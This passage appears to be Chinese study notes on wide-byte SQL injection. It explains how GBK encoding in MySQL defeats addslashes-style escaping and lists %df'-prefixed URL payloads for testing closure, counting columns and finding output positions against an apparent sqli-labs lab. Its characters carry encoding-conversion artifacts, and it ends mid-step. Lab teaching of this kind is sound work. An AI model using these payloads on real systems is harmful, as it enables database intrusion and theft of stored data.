1、函數(shù)

過濾輸入的函數(shù)：
addslashes
mysql_real_escape_string 
mysql_escape_string

當字符的大小為一個字節(jié)時，稱之為窄字節(jié) 例如ascii編碼
當字符的大小為兩個字節(jié)時，稱之為寬字節(jié) 例如GB2312、GBK、GB8030

mysql使用GBK編碼時,默認的會認為兩個字符為一個漢字,前一個字符的ascii值大于128,達到漢字范圍

2、寬字節(jié)注入

原理：
?當我們的mysql使用GBK編碼后，同時兩個字符的前一個字符ASCII碼大于128時，會將兩個字符認成一個漢字。
?當注入點使用轉義函數(shù)對輸入的特殊字符進行轉義時，考慮寬字節(jié)注入。

'----->\'

ascii 單字節(jié)
GBK 寬字節(jié)

??（1）判斷閉合方式

http://124.222.124.9:8888/Less-32/?id=1%df' and 1=2 %23

??（2）判斷列數(shù)

http://124.222.124.9:8888/Less-32/?id=1%df' order by 3%23

??（3）查看回顯位置

http://124.222.124.9:8888/Less-32/?id=-1%df' union select 1,2,3%23

??（4）查看庫名